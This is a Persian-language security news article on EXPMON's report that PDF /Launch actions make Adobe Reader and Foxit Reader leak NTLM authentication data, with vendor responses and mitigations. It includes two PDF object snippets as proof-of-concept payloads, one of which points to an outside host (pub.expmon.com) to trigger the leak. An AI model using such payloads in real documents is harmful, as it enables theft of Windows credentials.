کشف آسیب‌پذیری جدید در فایل‌های PDF: نشت اطلاعات NTLM در Adobe Reader و Foxit Reader

محققان امنیت سایبری EXPMON به‌تازگی رفتاری ناشناخته و تحت عنوان “روز صفر” در نمونه‌های PDF کشف کرده‌اند که می‌تواند توسط مهاجمان برای سرقت اطلاعات حساس احراز هویت NTLM مورد سوءاستفاده قرار گیرد.

این کشف نقاط ضعف در نحوه پردازش اقدامات خاص در Adobe Reader و Foxit Reader را نشان می‌دهد. هرچند محققان تأکید دارند که هیچ نشانه‌ای مبنی بر طراحی عمدی این رفتار با نیت مخرب در نمونه‌های بررسی‌شده وجود ندارد.

تحلیل فنی

EXPMON هنگام بررسی نمونه‌های PDF آپلودشده در VirusTotal متوجه رفتار ناشناخته‌ای در نحوه اجرای کدها توسط فایل‌های PDF شد. این آسیب‌پذیری به نحوه پردازش اقدامات /Launch توسط Adobe Reader و Foxit Reader مربوط می‌شود. مهاجمان می‌توانند از این رفتار برای سرقت اطلاعات NTLM، یکی از مکانیزم‌های کلیدی احراز هویت در شبکه‌های ویندوز، بهره‌برداری کنند.

یک نمونه از کد مخرب به این شکل است:

5 0 obj
  << /Type /Action
     /S /Launch
     /F (/Applications/Calculator.app/Contents/MacOS/Calculator)
  >>
endobj

این کد باعث اجرای اقدامی می‌شود که به‌طور ناخواسته اطلاعات NTLM را فاش می‌کند.

بررسی آسیب‌پذیری در نرم‌افزارها

Adobe Reader

• هنگام باز کردن فایل PDF مخرب، Adobe Reader تلاش می‌کند به یک منبع شبکه‌ای به نام “Applications” متصل شود. اگر این اتصال موفقیت‌آمیز باشد، اطلاعات NTLM قبل از نمایش هشدار به کاربر، به سرور ارسال می‌شود.
• این رفتار فقط در دامنه‌های داخلی (Intranet) رخ می‌دهد و Adobe این مسئله را بخشی از طراحی خود می‌داند:

  «فراخوان‌های DNS/NTLM فقط برای دامنه‌های داخلی انجام می‌شوند. Acrobat این دامنه‌ها را قابل‌اعتماد می‌داند، اگر ویژگی “Automatically trust sites from Win OS security zones” فعال باشد.»

Foxit Reader

• در این برنامه، تغییر مسیر فایل در فیلد /F به دامنه‌ای عمومی مانند pub.expmon.com منجر به ارسال اطلاعات NTLM به سرور مهاجم می‌شود:

5 0 obj
  << /Type /Action
     /S /Launch
     /F (/pub.expmon.com/test)
  >>
endobj

• کاربران هنگام باز کردن فایل PDF مخرب، حتی پس از نمایش هشدار، اطلاعات NTLM خود را فاش می‌کنند. Foxit این مشکل را به‌عنوان یک آسیب‌پذیری جدی شناسایی کرده و در دسامبر ۲۰۲۴ نسخه به‌روزرسانی‌شده‌ای منتشر کرده است.

پاسخ شرکت‌ها

• Adobe Reader: Adobe این رفتار را مشکل امنیتی نمی‌داند و تأکید می‌کند که این طراحی با مدل اعتماد آن‌ها سازگار است.
• Foxit Reader: Foxit این مشکل را به رسمیت شناخته و نسخه 2024.4 را برای رفع آن منتشر کرده است.

توصیه‌ها

• برای کاربران Adobe Reader:
  • ویژگی “Automatically trust sites from Win OS security zones” را غیرفعال کنید.
• برای کاربران Foxit Reader:
  • به نسخه 2024.4 یا بالاتر به‌روزرسانی کنید.

اهمیت کشف

EXPMON تأکید دارد که این یافته‌ها نشان‌دهنده قدرت تحلیل داده‌های کلان (BDA) در شناسایی تهدیدات جدید و بهبود توانایی‌های کشف اکسپلویت‌ها است. این کشف هشداری است برای بررسی دقیق‌تر رفتارهای ناشناخته در نرم‌افزارهای پرکاربرد.